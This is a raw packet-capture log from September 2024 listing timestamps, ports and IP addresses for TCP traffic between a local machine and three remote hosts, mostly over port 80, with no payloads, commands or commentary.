Sep 27, 2024 00:29:11.250334024 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.250334978 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.250345945 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.250375986 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.251100063 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.298120022 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.335434914 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.335449934 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.335469961 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.335483074 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.335541964 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.335585117 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.335639000 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.335649967 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.335660934 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.335685015 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.335903883 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.335913897 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.335943937 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.335982084 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.335994005 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.336003065 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.336024046 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.336047888 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.336194992 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.336265087 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.336275101 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.336294889 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.336460114 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.336497068 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.336508036 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.336536884 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.336570978 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.336582899 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.336594105 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.336606979 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.336612940 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.336648941 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.336657047 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.337399006 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.337409973 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.337420940 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.337440968 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.337457895 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.337466002 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.337470055 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.337482929 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.337498903 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.337505102 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.337508917 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.337531090 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.338221073 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.338254929 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.338258028 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.338267088 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.338340998 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.338351011 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.338361979 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.338372946 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.338373899 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.338395119 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.338399887 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.338414907 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.339148998 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.339159966 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.339170933 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.339186907 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.339210987 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.339262962 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.339272022 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.339282036 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.339293957 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.339307070 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.339308023 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.339334011 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.339983940 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.340020895 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.340042114 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.340053082 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.340084076 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.340105057 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.340116978 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.340126991 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.340137959 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.340147018 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.340148926 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.340186119 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.340903044 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.340913057 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.340922117 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.340931892 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.340946913 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.340965986 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.340991974 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.341001987 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.341012955 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.341026068 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.341032982 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.341048956 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.341794014 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.341804028 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.341814041 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.341824055 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.341830969 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.341836929 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.341845989 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.341872931 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.427963972 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.427979946 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.427987099 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.428136110 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.428148985 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.428158045 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.428226948 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.428503990 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.428517103 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.428529978 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.428564072 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.428576946 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.428842068 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.428966999 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.428977966 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.428988934 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429002047 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429014921 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429022074 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429025888 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429039001 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429053068 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429059029 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429078102 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429091930 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429112911 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429131985 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429132938 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429145098 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429157019 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429167986 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429172039 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429186106 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429187059 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429199934 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429212093 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429231882 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429235935 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429249048 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429263115 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429264069 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429274082 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429282904 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429289103 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429301977 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429306984 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429315090 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429327965 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429341078 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429361105 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429455996 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429475069 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429486990 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429497957 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429512024 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429514885 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429528952 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429533958 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429547071 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429557085 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429568052 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429570913 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429580927 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429588079 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429600000 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429613113 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429621935 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429627895 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429641008 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429655075 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429670095 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429676056 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429706097 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429717064 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429728031 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429739952 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.429743052 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.429765940 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.430020094 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430032015 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430042982 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430063963 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430067062 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.430078983 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430090904 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430103064 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430104017 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.430116892 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430123091 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.430130959 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430150986 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.430181026 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.430634975 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430646896 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430658102 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430669069 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430681944 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430691004 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.430702925 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430713892 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.430718899 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430741072 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430747032 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430752039 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430757999 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430763006 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430771112 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.430802107 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.430850983 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.433243990 CEST	443	57912	172.67.162.108	192.168.2.6
Sep 27, 2024 00:29:11.433351994 CEST	57912	443	192.168.2.6	172.67.162.108
Sep 27, 2024 00:29:11.433681965 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.433732033 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.433773041 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.433784962 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.433795929 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.433806896 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.433820009 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.433826923 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.433832884 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.433847904 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.433860064 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.433872938 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.433896065 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.433896065 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.433896065 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.433929920 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.433942080 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.433952093 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.433967113 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.433995008 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.434022903 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434103012 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434124947 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434138060 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434159994 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.434180975 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.434803963 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434817076 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434827089 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434839964 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434850931 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.434860945 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434879065 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434880972 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.434892893 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434905052 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434916019 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434921980 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.434928894 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434933901 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.434941053 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434953928 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434962034 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.434966087 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.434978962 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.435000896 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.435026884 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.436124086 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.436136007 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.436146021 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.436156988 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.436167955 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.436178923 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.436203003 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.443878889 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.463871956 CEST	57912	443	192.168.2.6	172.67.162.108
Sep 27, 2024 00:29:11.463907957 CEST	443	57912	172.67.162.108	192.168.2.6
Sep 27, 2024 00:29:11.464296103 CEST	443	57912	172.67.162.108	192.168.2.6
Sep 27, 2024 00:29:11.467456102 CEST	57912	443	192.168.2.6	172.67.162.108
Sep 27, 2024 00:29:11.467576027 CEST	57912	443	192.168.2.6	172.67.162.108
Sep 27, 2024 00:29:11.467607975 CEST	443	57912	172.67.162.108	192.168.2.6
Sep 27, 2024 00:29:11.489294052 CEST	443	57909	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:11.489379883 CEST	443	57909	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:11.489415884 CEST	57909	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:11.489496946 CEST	57909	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:11.516732931 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.516757965 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.516769886 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.516782045 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.516793966 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.516820908 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.516885042 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.516917944 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.518208981 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518222094 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518233061 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518249035 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518260956 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518265963 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.518273115 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518297911 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.518744946 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518755913 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518767118 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518789053 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.518810987 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.518888950 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518899918 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518909931 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518919945 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518930912 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518933058 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.518942118 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518951893 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518954992 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.518961906 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518973112 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.518975019 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.518992901 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.519351006 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519361973 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519371986 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519393921 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.519412994 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519416094 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.519423962 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519434929 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519445896 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519455910 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519464016 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.519467115 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519478083 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519484043 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:11.519489050 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:11.519490004 CEST	80	57911	147.45.44.104	192.168.2.6
